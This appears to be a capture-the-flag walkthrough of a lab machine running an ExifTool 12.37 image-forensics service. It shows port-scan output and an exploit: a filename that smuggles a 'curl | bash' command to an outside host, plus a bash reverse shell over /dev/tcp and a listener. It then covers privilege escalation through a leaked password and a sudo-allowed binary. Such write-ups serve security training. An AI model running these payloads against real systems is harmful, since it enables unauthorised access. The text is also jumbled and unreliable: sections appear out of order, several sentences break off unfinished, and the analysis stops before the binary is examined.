Open 10.129.11.68:22
Open 10.129.11.68:80
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack ttl 63 OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
80/tcp open http syn-ack ttl 63 Apache httpd 2.4.41
|_http-title: Did not follow redirect to http://eforenzics.htb/
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.41 (Ubuntu)
Service Info: Host: eforenzics.htb; OS: Linux; CPE: cpe:/o:linux:linux_kernel
Uploading an image will result in a report that you can view.
Example
ExifTool Version Number : 12.37
File Name : image.jpg
Directory : .
File Size : 335 bytes
File Modification Date/Time : 2023:01:23 20:03:07+00:00
File Access Date/Time : 2023:01:23 20:03:07+00:00
File Inode Change Date/Time : 2023:01:23 20:03:07+00:00
File Permissions : -rw-r--r--
File Type : JPEG
File Type Extension : jpg
MIME Type : image/jpeg
JFIF Version : 1.01
Exif Byte Order : Big-endian (Motorola, MM)
X Resolution : 72
Y Resolution : 72
Resolution Unit : inches
Y Cb Cr Positioning : Centered
DjVu Version : 0.24
Spatial Resolution : 300
Gamma : 2.2
Orientation : Horizontal (normal)
Warning : Ignored invalid metadata entry(s)
Image Width : 1
Image Height : 1
Encoding Process : Extended sequential DCT, arithmetic coding
Bits Per Sample : 8
Color Components : 1
Image Size : 1x1
Megapixels : 0.000001
Exploitation
Using the discovered vulnerability we will try to gain a shell on our target.
Exiftool 12.37
# Generate malicious filename
cp image.jpg 'curl 10.10.14.71 | bash |'
# Generate an index.html containing our reverse shell code
cat index.html
/bin/bash -c "/bin/bash -i >& /dev/tcp/10.10.14.71/4444 0>&1"
# Host a webserver
python -m http.server 80
# In another tab create a listener
pwncat-cs -lp 4444
Enumeration
After we received our shell it's time to enumerate the systmen as we are just the www-data user without any further permissions.
Linpeas
Linpeas will show us a cronjob that runs regularly at a specific time and uses a script located at /usr/local/investigation.
Inside that folder we will find an E-Mail that contains a Windows Security Log.
Using the password we are able to switch from www-data to smorton.
su - smorton
Privilege Escalation
Enumeration
Checking the permissiosn of smorton reveals that we are able to run /usr/bin/binary as root.
smorton@investigation:~$ sudo -l
Matching Defaults entries for smorton on investigation:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User smorton may run the following commands on investigation:
(root) NOPASSWD: /usr/bin/binary
Analyzing /usr/bin/binary
Executing the binary does result in receiving the text Exiting...
Checking the Website we notice that there's a service that they offer located at .
The service is described as Image Forensics. You are able to upload an image file and they will provide a detailed forensic analysis.
The first line shows us the used ExifTool Version which is 12.37. If you look this up you'll come across
We pull that binary to our machine and use to take a look at the decompiled code.